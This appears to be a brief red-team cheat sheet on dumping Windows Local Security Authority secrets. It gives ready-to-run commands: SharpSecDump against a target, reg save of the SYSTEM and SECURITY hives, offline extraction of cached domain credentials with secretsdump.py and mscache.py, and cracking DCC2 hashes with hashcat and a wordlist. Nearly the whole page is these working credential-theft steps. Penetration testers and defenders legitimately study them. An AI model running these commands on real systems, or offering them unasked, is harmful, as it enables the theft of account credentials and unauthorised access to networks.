LSA

Local Security Authority

SharpSecDump

Decrypt LSA secrets on target:

PS > Invoke-SharpSecDump -C "-target=127.0.0.1"

Domain cached credentials are stored within LSA secrets in HKLM:\SECURITY registry hive:

Cmd > reg save hklm\system system.hive
Cmd > reg save hklm\security security.hive

Export registry hives and extract cached creds locally with secretsdump.py:

$ secretsdump.py -system system.hive -security security.hive LOCAL

Export registry hives and extract cached creds locally with mscache.py:

$ python mscache.py --system system.hive --security security.hive

$ hashcat -m 2100 -O -a 0 -w 3 --session=dcc2 -o dcc2.out dcc2.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule

Last updated 9 months ago